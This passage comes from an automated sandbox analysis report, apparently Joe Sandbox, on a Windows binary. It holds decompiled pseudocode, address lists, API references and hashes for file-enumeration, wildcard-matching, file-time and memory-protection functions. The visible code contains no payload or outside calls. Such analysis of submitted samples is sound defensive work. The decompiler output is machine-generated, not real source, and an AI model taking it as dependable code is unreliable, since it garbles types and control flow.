															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t178 - _t131;
															if(_t178 != _t131) {
																E003F6310(_t154, _t193 + _t178 * 4, _t131 - _t178, 4, E003FB1A0);
															}
														} else {
															_push(_t123);
															_push(_t201);
															_push(_t201);
															_push(_t154);
															L28();
															L54:
															_t201 = _t123;
														}
														__eflags = _t213 - 0xffffffff;
														if(_t213 != 0xffffffff) {
															FindClose(_t213);
														}
														_t124 = _t201;
													} else {
														_t124 =  &(_t154[1]);
														__eflags = _t169 -  &(_t154[1]);
														if(_t169 ==  &(_t154[1])) {
															goto L47;
														} else {
															_push(_t212);
															_push(0);
															_push(0);
															_push(_t154);
															L28();
														}
													}
													L58:
													_pop(_t202);
													_pop(_t214);
													__eflags = _v16 ^ _t220;
													_pop(_t155);
													return E003EFBBC(_t124, _t155, _v16 ^ _t220, _t193, _t202, _t214);
												} else {
													goto L34;
												}
											}
										} else {
											_t138 = 0xc;
											L36:
											return _t138;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t194 = _v16;
									 *((intOrPtr*)(_v24 + _t197)) = _t194;
									_t197 = _t197 + 4;
									_t191 = _t194 + _v12;
									_v16 = _t194 + _v12;
									__eflags = _t197 - _t150;
								} while (_t197 != _t150);
								goto L23;
							}
						} else {
							_t198 = _t197 | 0xffffffff;
							L24:
							E003F8DCC(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t159;
							_t146 = E003FF110( *_t206,  &_v8);
							__eflags = _t146;
							if(_t146 != 0) {
								_push( &_v36);
								_push(_t146);
								_push( *_t206);
								L38();
								_t222 = _t222 + 0xc;
							} else {
								_t146 =  &_v36;
								_push(_t146);
								_push(0);
								_push(0);
								_push( *_t206);
								L28();
								_t222 = _t222 + 0x10;
							}
							_t198 = _t146;
							__eflags = _t198;
							if(_t198 != 0) {
								break;
							}
							_t206 = _t206 + 4;
							_t159 = 0;
							__eflags =  *_t206;
							if( *_t206 != 0) {
								continue;
							} else {
								_t150 = _v336.cAlternateFileName;
								_t197 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E003FB562( &_v36);
						_t91 = _t198;
						goto L26;
					}
				} else {
					_t147 = E003F91A8();
					_t217 = 0x16;
					 *_t147 = _t217;
					E003F9087();
					_t91 = _t217;
					L26:
					return _t91;
				}
				L68:
			}


























































































                0x003fb1bd
                0x003fb1c0
                0x003fb1c6
                0x003fb1de
                0x003fb1e1
                0x003fb1e5
                0x003fb1e7
                0x003fb1e9
                0x003fb1eb
                0x003fb1ee
                0x003fb1f1
                0x003fb1f4
                0x003fb1f6
                0x003fb24e
                0x003fb24e
                0x003fb254
                0x003fb256
                0x003fb261
                0x003fb265
                0x003fb267
                0x003fb26a
                0x003fb26e
                0x003fb26e
                0x003fb270
                0x003fb272
                0x003fb274
                0x003fb276
                0x003fb276
                0x003fb278
                0x003fb27b
                0x003fb27e
                0x003fb27e
                0x003fb280
                0x003fb281
                0x003fb281
                0x003fb28c
                0x003fb28e
                0x003fb291
                0x003fb292
                0x003fb295
                0x003fb295
                0x003fb299
                0x003fb29c
                0x003fb29f
                0x003fb29f
                0x003fb2ad
                0x003fb2af
                0x003fb2b2
                0x003fb2b4
                0x003fb2be
                0x003fb2c1
                0x003fb2c4
                0x003fb2c6
                0x003fb2c9
                0x003fb2cb
                0x003fb31b
                0x003fb31e
                0x003fb31e
                0x003fb320
                0x00000000
                0x003fb2cd
                0x003fb2cf
                0x003fb2cf
                0x003fb2d1
                0x003fb2d4
                0x003fb2d4
                0x003fb2d9
                0x003fb2dc
                0x003fb2dc
                0x003fb2de
                0x003fb2df
                0x003fb2df
                0x003fb2e3
                0x003fb2e6
                0x003fb2e6
                0x003fb2e9
                0x003fb2ec
                0x003fb2f9
                0x003fb2fe
                0x003fb301
                0x003fb303
                0x003fb33d
                0x003fb33e
                0x003fb33f
                0x003fb340
                0x003fb341
                0x003fb342
                0x003fb347
                0x003fb34b
                0x003fb34d
                0x003fb34e
                0x003fb351
                0x003fb351
                0x003fb354
                0x003fb354
                0x003fb356
                0x003fb357
                0x003fb357
                0x003fb360
                0x003fb361
                0x003fb364
                0x003fb367
                0x003fb36a
                0x003fb36c
                0x003fb373
                0x003fb375
                0x003fb378
                0x003fb382
                0x003fb385
                0x003fb386
                0x003fb388
                0x003fb39c
                0x003fb39c
                0x003fb39f
                0x003fb3a9
                0x003fb3ae
                0x003fb3b1
                0x003fb3b3
                0x00000000
                0x003fb3b5
                0x003fb3b9
                0x003fb3c2
                0x003fb3c8
                0x00000000
                0x003fb3cb
                0x003fb38a
                0x003fb38a
                0x003fb390
                0x003fb395
                0x003fb398
                0x003fb39a
                0x003fb3d1
                0x003fb3d3
                0x003fb3d4
                0x003fb3d5
                0x003fb3d6
                0x003fb3d7
                0x003fb3d8
                0x003fb3dd
                0x003fb3e0
                0x003fb3e1
                0x003fb3e3
                0x003fb3e9
                0x003fb3f0
                0x003fb3f3
                0x003fb3f6
                0x003fb3f7
                0x003fb3fa
                0x003fb3fb
                0x003fb3fe
                0x003fb3ff
                0x003fb420
                0x003fb420
                0x003fb422
                0x00000000
                0x00000000
                0x003fb407
                0x003fb409
                0x003fb40b
                0x003fb40d
                0x003fb40f
                0x003fb411
                0x003fb413
                0x003fb41e
                0x00000000
                0x003fb41e
                0x003fb413
                0x003fb40f
                0x00000000
                0x003fb40b
                0x003fb424
                0x003fb426
                0x003fb429
                0x003fb442
                0x003fb442
                0x003fb444
                0x003fb447
                0x003fb457
                0x003fb459
                0x003fb459
                0x003fb449
                0x003fb449
                0x003fb44c
                0x00000000
                0x003fb44e
                0x003fb44e
                0x003fb451
                0x00000000
                0x003fb453
                0x003fb453
                0x003fb453
                0x003fb451
                0x003fb44c
                0x003fb467
                0x003fb46b
                0x003fb479
                0x003fb47e
                0x003fb493
                0x003fb495
                0x003fb49b
                0x003fb49e
                0x003fb4d0
                0x003fb4d0
                0x003fb4d5
                0x003fb4db
                0x003fb4db
                0x003fb4e2
                0x003fb4fc
                0x003fb4fc
                0x003fb4fd
                0x003fb503
                0x003fb509
                0x003fb50a
                0x003fb50b
                0x003fb510
                0x003fb513
                0x003fb515
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003fb4e4
                0x003fb4e4
                0x003fb4ea
                0x003fb4ec
                0x00000000
                0x003fb4ee
                0x003fb4ee
                0x003fb4f1
                0x00000000
                0x003fb4f3
                0x003fb4f3
                0x003fb4fa
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003fb4fa
                0x003fb4f1
                0x003fb4ec
                0x00000000
                0x003fb517
                0x003fb51f
                0x003fb525
                0x003fb527
                0x003fb527
                0x003fb52f
                0x003fb534
                0x003fb53c
                0x003fb53f
                0x003fb541
                0x003fb555
                0x003fb55a
                0x003fb4a0
                0x003fb4a0
                0x003fb4a1
                0x003fb4a2
                0x003fb4a3
                0x003fb4a4
                0x003fb4ac
                0x003fb4ac
                0x003fb4ac
                0x003fb4ae
                0x003fb4b1
                0x003fb4b4
                0x003fb4b4
                0x003fb4ba
                0x003fb42b
                0x003fb42b
                0x003fb42e
                0x003fb430
                0x00000000
                0x003fb432
                0x003fb432
                0x003fb435
                0x003fb436
                0x003fb437
                0x003fb438
                0x003fb43d
                0x003fb430
                0x003fb4bc
                0x003fb4bf
                0x003fb4c0
                0x003fb4c1
                0x003fb4c3
                0x003fb4cc
                0x00000000
                0x00000000
                0x00000000
                0x003fb39a
                0x003fb36e
                0x003fb370
                0x003fb3cc
                0x003fb3d0
                0x003fb3d0
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003fb305
                0x003fb308
                0x003fb30b
                0x003fb30e
                0x003fb311
                0x003fb314
                0x003fb317
                0x003fb317
                0x00000000
                0x003fb2d4
                0x003fb2b6
                0x003fb2b6
                0x003fb322
                0x003fb324
                0x00000000
                0x003fb329
                0x003fb1f8
                0x003fb1f8
                0x003fb1fb
                0x003fb204
                0x003fb207
                0x003fb20e
                0x003fb210
                0x003fb229
                0x003fb22a
                0x003fb22b
                0x003fb22d
                0x003fb232
                0x003fb212
                0x003fb212
                0x003fb215
                0x003fb216
                0x003fb218
                0x003fb21a
                0x003fb21c
                0x003fb221
                0x003fb221
                0x003fb235
                0x003fb237
                0x003fb239
                0x00000000
                0x00000000
                0x003fb23f
                0x003fb242
                0x003fb244
                0x003fb246
                0x00000000
                0x003fb248
                0x003fb248
                0x003fb24b
                0x00000000
                0x003fb24b
                0x00000000
                0x003fb246
                0x003fb32a
                0x003fb32d
                0x003fb332
                0x00000000
                0x003fb335
                0x003fb1c8
                0x003fb1c8
                0x003fb1cf
                0x003fb1d0
                0x003fb1d2
                0x003fb1d7
                0x003fb336
                0x003fb33a
                0x003fb33a
                0x00000000

                APIs
                • _free.LIBCMT ref: 003FB324
                  • Part of subcall function 003F9097: IsProcessorFeaturePresent.KERNEL32(00000017,003F9086,00000000,003F8D94,00000000,00000000,00000000,00000016,?,?,003F9093,00000000,00000000,00000000,00000000,00000000), ref: 003F9099
                  • Part of subcall function 003F9097: GetCurrentProcess.KERNEL32(C0000417,003F8D94,00000000,?,00000003,003F9868), ref: 003F90BB
                  • Part of subcall function 003F9097: TerminateProcess.KERNEL32(00000000,?,00000003,003F9868), ref: 003F90C2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                • String ID: *?$.
                • API String ID: 2667617558-3972193922
                • Opcode ID: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
                • Instruction ID: 86a4ab77e3cd0b511c81d10d60dd2bf25a6af154b8ffeb2fd568e790305f5739
                • Opcode Fuzzy Hash: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
                • Instruction Fuzzy Hash: D7517FB5E0010EAFDF16DFA8C881ABDF7B5EF58310F25416AEA54E7341E7359A018B50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D75DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E003D75DE(void* __ecx) {
				void* __esi;
				char _t55;
				signed int _t58;
				void* _t62;
				signed int _t63;
				signed int _t69;
				signed int _t86;
				void* _t91;
				void* _t101;
				intOrPtr* _t106;
				void* _t108;

				E003EEB78(0x4027e9, _t108);
				E003EEC50(0x60f8);
				_t106 =  *((intOrPtr*)(_t108 + 0xc));
				if( *_t106 == 0) {
					L3:
					_t101 = 0x802;
					E003E0602(_t108 - 0x1014, _t106, 0x802);
					L4:
					_t82 =  *((intOrPtr*)(_t108 + 8));
					E003D77DF(_t106,  *((intOrPtr*)(_t108 + 8)), _t108 - 0x4094, 0x800);
					_t113 =  *((short*)(_t108 - 0x4094)) - 0x3a;
					if( *((short*)(_t108 - 0x4094)) == 0x3a) {
						__eflags =  *((char*)(_t108 + 0x10));
						if(__eflags == 0) {
							E003E05DA(__eflags, _t108 - 0x1014, _t108 - 0x4094, _t101);
							E003D6EDB(_t108 - 0x3094);
							_push(0);
							_t55 = E003DA56D(_t108 - 0x3094, __eflags, _t106, _t108 - 0x3094);
							_t86 =  *(_t108 - 0x208c);
							 *((char*)(_t108 - 0xd)) = _t55;
							__eflags = _t86 & 0x00000001;
							if((_t86 & 0x00000001) != 0) {
								__eflags = _t86 & 0xfffffffe;
								E003DA4ED(_t106, _t86 & 0xfffffffe);
							}
							E003D9556(_t108 - 0x204c);
							 *((intOrPtr*)(_t108 - 4)) = 1;
							_t58 = E003D9F1A(_t108 - 0x204c, __eflags, _t108 - 0x1014, 0x11);
							__eflags = _t58;
							if(_t58 != 0) {
								_push(0);
								_push(_t108 - 0x204c);
								_push(0);
								_t69 = E003D3BBA(_t82);
								__eflags = _t69;
								if(_t69 != 0) {
									E003D9620(_t108 - 0x204c);
								}
							}
							E003D9556(_t108 - 0x50cc);
							__eflags =  *((char*)(_t108 - 0xd));
							 *((char*)(_t108 - 4)) = 2;
							if( *((char*)(_t108 - 0xd)) != 0) {
								_t63 = E003D98E0(_t108 - 0x50cc, _t106, _t106, 5);
								__eflags = _t63;
								if(_t63 != 0) {
									SetFileTime( *(_t108 - 0x50c4), _t108 - 0x206c, _t108 - 0x2064, _t108 - 0x205c);
								}
							}
							E003DA4ED(_t106,  *(_t108 - 0x208c));
							E003D959A(_t108 - 0x50cc);
							_t91 = _t108 - 0x204c;
						} else {
							E003D9556(_t108 - 0x6104);
							_push(1);
							_push(_t108 - 0x6104);
							_push(0);
							 *((intOrPtr*)(_t108 - 4)) = 0;
							E003D3BBA(_t82);
							_t91 = _t108 - 0x6104;
						}
						_t62 = E003D959A(_t91);
					} else {
						E003D2021(_t113, 0x53, _t82 + 0x32, _t106);
						_t62 = E003D6D83(0x411098, 3);
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0xc));
					return _t62;
				}
				_t112 =  *((intOrPtr*)(_t106 + 2));
				if( *((intOrPtr*)(_t106 + 2)) != 0) {
					goto L3;
				} else {
					_t101 = 0x802;
					E003E0602(_t108 - 0x1014, 0x4037a0, 0x802);
					E003E05DA(_t112, _t108 - 0x1014, _t106, 0x802);
					goto L4;
				}
			}














                0x003d75e3
                0x003d75ed
                0x003d75f4
                0x003d75fd
                0x003d762c
                0x003d762c
                0x003d763a
                0x003d763f
                0x003d763f
                0x003d764f
                0x003d7654
                0x003d765c
                0x003d767b
                0x003d767f
                0x003d76bc
                0x003d76c7
                0x003d76d4
                0x003d76d7
                0x003d76dc
                0x003d76e2
                0x003d76e5
                0x003d76e8
                0x003d76ea
                0x003d76ef
                0x003d76ef
                0x003d76fa
                0x003d7707
                0x003d7715
                0x003d771a
                0x003d771c
                0x003d771e
                0x003d7727
                0x003d7728
                0x003d7729
                0x003d772e
                0x003d7730
                0x003d7738
                0x003d7738
                0x003d7730
                0x003d7743
                0x003d7748
                0x003d774c
                0x003d7750
                0x003d775b
                0x003d7760
                0x003d7762
                0x003d777f
                0x003d777f
                0x003d7762
                0x003d778c
                0x003d7797
                0x003d779c
                0x003d7681
                0x003d7687
                0x003d768c
                0x003d7696
                0x003d7697
                0x003d769a
                0x003d769d
                0x003d76a2
                0x003d76a2
                0x003d77a2
                0x003d765e
                0x003d7665
                0x003d7671
                0x003d7671
                0x003d77ad
                0x003d77b5
                0x003d77b5
                0x003d75ff
                0x003d7603
                0x00000000
                0x003d7605
                0x003d7605
                0x003d7617
                0x003d7625
                0x00000000
                0x003d7625

                APIs
                • __EH_prolog.LIBCMT ref: 003D75E3
                  • Part of subcall function 003E05DA: _wcslen.LIBCMT ref: 003E05E0
                  • Part of subcall function 003DA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 003DA598
                • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 003D777F
                  • Part of subcall function 003DA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,003DA325,?,?,?,003DA175,?,00000001,00000000,?,?), ref: 003DA501
                  • Part of subcall function 003DA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,003DA325,?,?,?,003DA175,?,00000001,00000000,?,?), ref: 003DA532
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                • String ID: :
                • API String ID: 3226429890-336475711
                • Opcode ID: fa792feaafb8b533fbba5f53d559d8af54c6ab5340266577c039ddac30e2572e
                • Instruction ID: 9ad1478d7cd13fd6dbd323bf2d83c7c73ac4b1b6f06327c319ddab45d435dd1e
                • Opcode Fuzzy Hash: fa792feaafb8b533fbba5f53d559d8af54c6ab5340266577c039ddac30e2572e
                • Instruction Fuzzy Hash: FB418672800158A9EB26EB64ED55EEEB37DEF45300F0040A7B605A7292EB745F84CF61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003DB37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                Download Yara Rule
                C-Code - Quality: 84%
                			E003DB37A() {
				void* __ecx;
				signed int _t23;
				signed int _t25;
				void* _t27;
				void* _t31;
				signed int _t35;
				void* _t39;
				void* _t40;
				signed int _t41;
				intOrPtr _t42;
				void* _t46;
				signed int _t49;
				void* _t50;
				signed int _t51;
				void* _t52;
				signed short* _t53;
				signed short* _t55;
				signed short* _t56;
				void* _t57;

				_t56 =  *(_t57 + 0x14);
				_t55 =  *(_t57 + 0x1c);
				 *(_t57 + 0x18) = 0x2a;
				_t39 = 0x2e;
				while(1) {
					 *(_t57 + 0x18) = _t56;
					_t51 = E003DB4EC( *_t55 & 0x0000ffff,  *((intOrPtr*)(_t57 + 0x24))) & 0x0000ffff;
					_t41 = E003DB4EC( *_t56 & 0x0000ffff,  *((intOrPtr*)(_t57 + 0x24))) & 0x0000ffff;
					_t56 =  &(_t56[1]);
					_t49 = _t41;
					_t23 = _t41;
					if(_t49 == 0) {
						break;
					}
					if(_t49 ==  *(_t57 + 0x14)) {
						_t25 =  *_t56 & 0x0000ffff;
						if(_t25 == 0) {
							L28:
							return 1;
						}
						_t50 = 0x2e;
						_t40 = 0;
						if(_t25 != _t50) {
							L26:
							while( *_t55 != _t40) {
								_push( *((intOrPtr*)(_t57 + 0x24)));
								_push(_t55);
								_push(_t56);
								_t27 = E003DB37A();
								_t55 =  &(_t55[1]);
								if(_t27 != 0) {
									goto L28;
								}
							}
							L27:
							return 0;
						}
						_t42 =  *((intOrPtr*)(_t57 + 0x10));
						_t52 = 0x2a;
						if( *((intOrPtr*)(_t42 + 4)) != _t52 ||  *((intOrPtr*)(_t42 + 6)) != 0) {
							_push(_t50);
							_push(_t55);
							_t53 = E003F22C6(_t42);
							if(( *(_t57 + 0x18))[2] != _t40) {
								if(_t53 == 0) {
									goto L26;
								}
								_t55 = _t53;
								_t31 = E003F6105(_t56, L"*?");
								_pop(_t46);
								if(_t31 != 0) {
									goto L26;
								}
								_t54 =  &(_t53[1]);
								_push(0x2e);
								_push( &(_t53[1]));
								if(E003F22C6(_t46) != 0) {
									goto L26;
								}
								_t35 = E003DB4CB( &(( *(_t57 + 0x14))[2]), _t54,  *((intOrPtr*)(_t57 + 0x24)));
								asm("sbb al, al");
								return  ~_t35 + 1;
							}
							if(_t53 == 0 || _t53[1] == _t40) {
								_t40 = 1;
							}
							return _t40;
						} else {
							goto L28;
						}
					}
					if(_t41 == 0x3f) {
						if(_t51 == 0) {
							goto L27;
						}
						L11:
						_t55 =  &(_t55[1]);
						continue;
					}
					if(_t23 == _t51) {
						goto L11;
					}
					if(_t23 != _t39) {
						goto L27;
					}
					if(_t51 == 0 || _t51 == 0x5c || _t51 == _t39) {
						continue;
					} else {
						goto L27;
					}
				}
				return _t23 & 0xffffff00 | _t51 == 0x00000000;
			}






















                0x003db37e
                0x003db383
                0x003db38a
                0x003db392
                0x003db393
                0x003db39b
                0x003db3a8
                0x003db3b5
                0x003db3b8
                0x003db3bb
                0x003db3bd
                0x003db3c2
                0x00000000
                0x00000000
                0x003db3cd
                0x003db404
                0x003db40b
                0x003db4b8
                0x00000000
                0x003db4b8
                0x003db413
                0x003db414
                0x003db419
                0x00000000
                0x003db4af
                0x003db49d
                0x003db4a1
                0x003db4a2
                0x003db4a3
                0x003db4a8
                0x003db4ad
                0x00000000
                0x00000000
                0x003db4ad
                0x003db4b4
                0x00000000
                0x003db4b4
                0x003db41f
                0x003db425
                0x003db42a
                0x003db436
                0x003db437
                0x003db43d
                0x003db449
                0x003db45d
                0x00000000
                0x00000000
                0x003db465
                0x003db467
                0x003db46d
                0x003db470
                0x00000000
                0x00000000
                0x003db472
                0x003db475
                0x003db477
                0x003db481
                0x00000000
                0x00000000
                0x003db490
                0x003db497
                0x00000000
                0x003db499
                0x003db44d
                0x003db455
                0x003db455
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003db42a
                0x003db3d2
                0x003db3f9
                0x00000000
                0x00000000
                0x003db3ff
                0x003db3ff
                0x00000000
                0x003db3ff
                0x003db3d7
                0x00000000
                0x00000000
                0x003db3dc
                0x00000000
                0x00000000
                0x003db3e5
                0x00000000
                0x003db3f1
                0x00000000
                0x003db3f1
                0x003db3e5
                0x00000000

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcschr
                • String ID: *
                • API String ID: 2691759472-163128923
                • Opcode ID: 9cfd16b1ca2f5550508bd0e671bf15df68da023ae634aba25b938e3b82f32d21
                • Instruction ID: 1f1d5f10a6e8d91790f4997356cdb0541c904dc2a739a8ae2a11bb5e6f87a9d5
                • Opcode Fuzzy Hash: 9cfd16b1ca2f5550508bd0e671bf15df68da023ae634aba25b938e3b82f32d21
                • Instruction Fuzzy Hash: DC310727544301DACB27DA16B902A7BE3F8EF90B14B17841FF98457343EB268C41A261
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                Download Yara Rule
                C-Code - Quality: 26%
                			E003EB48E(void* __ecx, void* __edx, void* __eflags, char _a3, char _a4, char _a7, char _a8, intOrPtr* _a8200) {
				void* __edi;
				void* __ebp;
				intOrPtr _t20;
				short* _t31;
				intOrPtr* _t33;
				signed int _t41;
				intOrPtr* _t42;
				void* _t44;

				E003EEC50(0x2004);
				_push(0x80000);
				_t42 = E003F3E33(__ecx);
				if(_t42 == 0) {
					E003D6CA7(0x411098);
				}
				_t33 = _a8200;
				 *_t42 = 0;
				_t41 = 0;
				while(1) {
					_push(0x1000);
					_push( &_a3);
					_push(0);
					_push(0);
					_push( &_a4);
					_push( *_t33);
					_t20 = E003EB314(_t41, 0);
					 *_t33 = _t20;
					if(_t20 == 0) {
						break;
					}
					if( *_t42 != 0 || _a8 != 0x7b) {
						if(_a8 == 0x7d || E003F3E13( &_a8) + _t41 > 0x3fffb) {
							break;
						} else {
							E003F7686(_t42,  &_a8);
							_t41 = E003F3E13(_t42);
							_t44 = _t44 + 0xc;
							if(_t41 == 0) {
								L11:
								if(_a7 == 0) {
									E003F6066(_t42 + _t41 * 2, L"\r\n");
								}
								continue;
							}
							_t6 = _t41 - 1; // -1
							_t31 = _t42 + _t6 * 2;
							while( *_t31 == 0x20) {
								_t31 = _t31 - 2;
								_t41 = _t41 - 1;
								if(_t41 != 0) {
									continue;
								}
								goto L11;
							}
							goto L11;
						}
					} else {
						continue;
					}
				}
				return _t42;
			}











                0x003eb493
                0x003eb49c
                0x003eb4a6
                0x003eb4ab
                0x003eb4b2
                0x003eb4b2
                0x003eb4b7
                0x003eb4c2
                0x003eb4c5
                0x003eb537
                0x003eb537
                0x003eb540
                0x003eb541
                0x003eb542
                0x003eb547
                0x003eb548
                0x003eb54a
                0x003eb54f
                0x003eb553
                0x00000000
                0x00000000
                0x003eb4cc
                0x003eb4dc
                0x00000000
                0x003eb4f2
                0x003eb4f8
                0x003eb503
                0x003eb505
                0x003eb50a
                0x003eb520
                0x003eb525
                0x003eb530
                0x003eb536
                0x00000000
                0x003eb525
                0x003eb50c
                0x003eb50f
                0x003eb512
                0x003eb518
                0x003eb51b
                0x003eb51e
                0x00000000
                0x00000000
                0x00000000
                0x003eb51e
                0x00000000
                0x003eb512
                0x00000000
                0x00000000
                0x00000000
                0x003eb4cc
                0x003eb565

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcslen
                • String ID: }
                • API String ID: 176396367-4239843852
                • Opcode ID: f861a701f9bb699819c6335624cdb3916b2328afd6382d79b615244fef4ec163
                • Instruction ID: 5a8c22d3cb1a3af8a33e204bab889d8d2f1301b40f45660dc85aa04f0336886f
                • Opcode Fuzzy Hash: f861a701f9bb699819c6335624cdb3916b2328afd6382d79b615244fef4ec163
                • Instruction Fuzzy Hash: 282104729043AA5AD733AA66D841A6BF3ECDF91750F11052AF640C71C1EB64994883B2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003DF344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 003DF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 003DF2E4
                  • Part of subcall function 003DF2C5: GetProcAddress.KERNEL32(004181C8,CryptUnprotectMemory), ref: 003DF2F4
                • GetCurrentProcessId.KERNEL32(?,?,?,003DF33E), ref: 003DF3D2
                Strings
                • CryptUnprotectMemory failed, xrefs: 003DF3CA
                • CryptProtectMemory failed, xrefs: 003DF389
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AddressProc$CurrentProcess
                • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                • API String ID: 2190909847-396321323
                • Opcode ID: 91813810f2468507c9a074d1e85e32556e8cd084118e321e342e260d8c9f22d3
                • Instruction ID: b5e1b54e632ff007c30e75a2f2bfb7691a5c31f7998237fc9c464359fe43041b
                • Opcode Fuzzy Hash: 91813810f2468507c9a074d1e85e32556e8cd084118e321e342e260d8c9f22d3
                • Instruction Fuzzy Hash: 1B110637A00229AFDF165F20FC85A6E3B58FF04760B12817BFC026B351DB349E418694
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003DC058 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                Download Yara Rule
                C-Code - Quality: 88%
                			E003DC058(signed short* _a4, intOrPtr _a8) {
				void* _t3;
				signed int _t7;
				intOrPtr _t9;
				char* _t11;
				signed short _t14;
				signed int _t16;
				signed short* _t18;

				_t18 = _a4;
				if( *_t18 != 0) {
					_t9 = _a8;
					_t16 = 0;
					do {
						_t11 = L"?*<>|\"";
